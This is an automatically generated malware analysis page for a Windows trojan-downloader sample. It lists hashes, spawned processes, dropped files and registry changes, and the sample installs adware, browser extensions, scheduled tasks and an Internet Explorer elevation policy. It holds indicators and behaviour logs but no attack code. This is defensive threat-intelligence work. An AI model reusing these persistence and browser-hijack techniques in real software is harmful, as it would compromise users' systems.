Trojan.Win32.IEDummy_ac0a46831c

by malwarelabrobot on August 10th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.hurb (Kaspersky), Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: ac0a46831c9c3cbc19e898321a86f789
SHA1: c44a8c9ed046da8e731938248b38a5ddd88f3d3c
SHA256: c0db83d5f0d6ba74780777d67bf813b7c891649e12631e369fb248e53190c4c0
SSDeep: 3072:nUc061qnIgiFwmg7y7CJowrIZFoiSkqXFrX1I lCF:r0agTJowrEWLI cF
Size: 99254 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-07-06 17:31:19
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

install_helper_FF.exe:500
taskkill.exe:1964
taskkill.exe:1240
taskkill.exe:776
BackgroundHost.exe:2036
PCPerformerSetup.tmp:548
%original file name%.exe:396
PCPerformerSetup.exe:284
PCPerformer.exe:476
SpeedTest.exe:1220
regsvr32.exe:788
regsvr32.exe:1272
regsvr32.exe:1432
install_helper_IE.exe:604
speedtest187.exe:356

The Trojan injects its code into the following process(es):

BackgroundHost.exe:1300

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process install_helper_FF.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\settings.json (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\jquery-1.9.1.min.js (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\install.rdf (987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\options.xul (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\rjs.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\skin\framework.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\config.js (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\subscriptloader.js (547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\content.js (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\icon.png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.js (1256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.xul (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\background.html (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.png (973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome.manifest (320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.ico (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.xml (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp (0 bytes)

The process BackgroundHost.exe:1300 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)

The process PCPerformerSetup.tmp:548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\PC Performer\is-TI75V.tmp (673 bytes)
%Program Files%\PC Performer\unins000.dat (9720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\PC Performer\is-FK08C.tmp (32429 bytes)
%Program Files%\PC Performer\is-LO644.tmp (601 bytes)
%Program Files%\PC Performer\is-0MQOJ.tmp (601 bytes)
%System%\roboot.exe (17 bytes)
%Program Files%\PC Performer\is-88KFP.tmp (10177 bytes)
%Program Files%\PC Performer\is-OR8M6.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\PC Performer\Uninstall PC Performer.lnk (722 bytes)
%Program Files%\PC Performer\is-RFK2G.tmp (601 bytes)
%Program Files%\PC Performer\is-J0TH5.tmp (673 bytes)
%Program Files%\PC Performer\is-CLLEA.tmp (601 bytes)
%Program Files%\PC Performer\is-DRJ95.tmp (673 bytes)
%Program Files%\PC Performer\is-US574.tmp (601 bytes)
%Program Files%\PC Performer\is-ET5QL.tmp (601 bytes)
%Program Files%\PC Performer\is-E9OU8.tmp (54184 bytes)
%Program Files%\PC Performer\is-KJP91.tmp (601 bytes)
%Program Files%\PC Performer\is-LDHVJ.tmp (601 bytes)
%Program Files%\PC Performer\is-6F8RF.tmp (46 bytes)
%Program Files%\PC Performer\is-UQFA0.tmp (601 bytes)
%Program Files%\PC Performer\is-EIDVD.tmp (601 bytes)
%Program Files%\PC Performer\is-R0INF.tmp (45 bytes)
%Program Files%\PC Performer\is-JH9KP.tmp (601 bytes)
%Documents and Settings%\All Users\Desktop\PC Performer.lnk (725 bytes)
%Program Files%\PC Performer\unins000.msg (302 bytes)
%Program Files%\PC Performer\is-O468T.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\PC Performer\PC Performer.lnk (737 bytes)
%Program Files%\PC Performer\is-5Q9FR.tmp (601 bytes)
%Program Files%\PC Performer\is-T36CQ.tmp (601 bytes)
%Program Files%\PC Performer\is-0S898.tmp (601 bytes)
%Program Files%\PC Performer\is-QUT18.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (17 bytes)
%Program Files%\PC Performer\is-UG752.tmp (57 bytes)
%Program Files%\PC Performer\is-3J2TL.tmp (601 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup (0 bytes)

The process %original file name%.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (2218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe (122458 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe (201724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe (201724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\country[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
C:\END (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe (122458 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)

The process PCPerformerSetup.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (0 bytes)

The process PCPerformer.exe:476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\PC Performer_UPDATES.job (268 bytes)
%WinDir%\Tasks\PC Performer_DEFAULT.job (260 bytes)
%Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\log_08-09-2014.log (8116 bytes)
%Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\eng_rcp.dat (3172 bytes)

The process SpeedTest.exe:1220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\bin\DeskTopIcon.ico (16 bytes)
%Program Files%\Speed Test 187\speedtest187.ico (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.exe (71964 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.xpi (9544 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\DeskTopIcon.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper.exe (53430 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_FF.exe (6841 bytes)
%Documents and Settings%\%current user%\Desktop\Speed Test.lnk (1 bytes)
%Program Files%\Speed Test 187\uninstall_nsis.exe (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.crx (8658 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_IE.exe (6841 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)

The process speedtest187.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Speed Test 187\config.xml (1 bytes)
%Program Files%\Speed Test 187\icon32.png (3 bytes)
%Program Files%\Speed Test 187\AddonsFramework.Typelib64.dll (548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (13 bytes)
%Program Files%\Speed Test 187\options.htm (780 bytes)
%Program Files%\Speed Test 187\icon24.png (2 bytes)
%Program Files%\Speed Test 187\icon48.ico (25 bytes)
%Program Files%\Speed Test 187\ButtonSite.dll (7938 bytes)
%Program Files%\Speed Test 187\json2.min.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (2712 bytes)
%Program Files%\Speed Test 187\content.js (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (1537 bytes)
%Program Files%\Speed Test 187\jquery-1.9.1.min.js (2410 bytes)
%Program Files%\Speed Test 187\icon24.ico (2 bytes)
%Program Files%\Speed Test 187\icon16.png (1 bytes)
%Program Files%\Speed Test 187\icon64.ico (25 bytes)
%Program Files%\Speed Test 187\background.html (939 bytes)
%Program Files%\Speed Test 187\uninstall.exe (794 bytes)
%Program Files%\Speed Test 187\icon32.ico (10 bytes)
%Program Files%\Speed Test 187\icon16.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (11 bytes)
%Program Files%\Speed Test 187\icon128.png (647 bytes)
%Program Files%\Speed Test 187\icon128.ico (25 bytes)
%Program Files%\Speed Test 187\ButtonSite64.dll (10790 bytes)
%Program Files%\Speed Test 187\updater.js (3 bytes)
%Program Files%\Speed Test 187\AddonsFramework.Typelib.dll (2128 bytes)
%Program Files%\Speed Test 187\BackgroundHost.exe (15235 bytes)
%Program Files%\Speed Test 187\BackgroundHost64.exe (15445 bytes)
%Program Files%\Speed Test 187\icon18.png (1 bytes)
%Program Files%\Speed Test 187\rjs.js (1 bytes)
%Program Files%\Speed Test 187\icon64.png (7 bytes)
%Program Files%\Speed Test 187\ScriptHost64.dll (10843 bytes)
%Program Files%\Speed Test 187\button.js (491 bytes)
%Program Files%\Speed Test 187\icon48.png (5 bytes)
%Program Files%\Speed Test 187\ScriptHost.dll (9711 bytes)
%Program Files%\Speed Test 187\updaterWrapper.js (2 bytes)
%Program Files%\Speed Test 187\icon18.ico (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (0 bytes)

Registry activity

The process install_helper_FF.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 E9 41 84 4C 60 95 C6 A4 2C 03 94 02 A5 DC E6"

[HKCU\Software\Mozilla\Firefox\Extensions]
"speedtest187@SpeedTest" = "C:\Documents\speedtest187@SpeedTest"

The process taskkill.exe:1964 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 D7 36 8E 13 71 C3 5B C4 6D 48 09 07 4F 42 C3"

The process taskkill.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 68 B1 75 3E 2F 77 8A F1 BA 20 41 9E EE AE 63"

The process taskkill.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 4F 0E 55 A3 41 A8 56 51 C1 45 77 F8 A0 70 0B"

The process BackgroundHost.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\ProgID]
"(Default)" = "Speed Test 187.BackgroundHostObject.1"

[HKCR\AppID\BackgroundHost.EXE]
"AppID" = "{18B9B16E-716F-43DF-A6AD-512C7D2EB983}"

[HKCR\Speed Test 187.BackgroundHostObject.1\CLSID]
"(Default)" = "{D058E340-4C95-4A15-A69F-8EE1AEE76E96}"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.BackgroundHostObject"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\LocalServer32]
"(Default)" = "%Program Files%\Speed Test 187\BackgroundHost.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"AppPath" = "%Program Files%\Speed Test 187"

[HKCR\Speed Test 187.BackgroundHostObject.1]
"(Default)" = "BackgroundHostObject Class"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}]
"(Default)" = "BackgroundHostObject Class"

[HKCR\Speed Test 187.BackgroundHostObject]
"(Default)" = "BackgroundHostObject Class"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\TypeLib]
"(Default)" = "{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}"

[HKCR\Speed Test 187.BackgroundHostObject\CLSID]
"(Default)" = "{D058E340-4C95-4A15-A69F-8EE1AEE76E96}"

[HKCU\Software\Speed Test 187]
"elevationPolicyGuid" = "{DD2AF093-42BC-4bde-93F4-07F4C3169D76}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"(Default)" = "{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}"

[HKCR\Speed Test 187.BackgroundHostObject\CurVer]
"(Default)" = "Speed Test 187.BackgroundHostObject.1"

[HKCR\AppID\{18B9B16E-716F-43DF-A6AD-512C7D2EB983}]
"(Default)" = "BackgroundHost"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\BackgroundHost.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"AppName" = "BackgroundHost.exe"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 64 1B 7E 02 CD 39 22 9F F9 18 12 9B 5D B7 52"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"Policy" = "3"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}]
"(Default)" = "IBackgroundHost"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0]
"(Default)" = "BackgroundHost 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD]
"BackgroundHost.exe" = "1"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\FLAGS]
"(Default)" = "0"

The process BackgroundHost.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080920140810\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 C1 59 21 D9 B6 34 EB 48 2D E0 AF B8 4C F4 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CachePrefix" = ":2014080920140810:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The process PCPerformerSetup.tmp:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoTutorial" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Setup Version" = "5.5.2 (u)"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanOnLaunch" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: User" = "%CurrentUserName%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: App Path" = "%Program Files%\PC Performer"
"Publisher" = "PerformerSoft LLC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanPMUI" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"InstallDate" = "20140809"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"MinorVersion" = "10"

[HKCU\Software\PerformerSoft\PC Performer]
"TrialType" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayIcon" = "%Program Files%\PC Performer\PCPerformer.exe"
"HelpLink" = "http://www.Performersoft.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"QuietUninstallString" = "%Program Files%\PC Performer\unins000.exe /SILENT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\PerformerSoft\PC Performer\LANG]
"LangID" = "0"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"MaxFixLimit" = "100"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayName" = "PC Performer"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"TELNO" = "(800) 871-7907"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"URLInfoAbout" = "http://www.Performersoft.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"InstallLocation" = "%Program Files%\PC Performer\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Icon Group" = "PC Performer"
"UninstallString" = "%Program Files%\PC Performer\unins000.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Language" = "en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\PerformerSoft\PC Performer\LANG]
"LangID" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C D1 5B 41 3A BA 2D FB 93 2C F0 B7 A3 1D CF D5"

[HKCU\Software\PerformerSoft\PC Performer\LANG]
"LangCode" = "en"

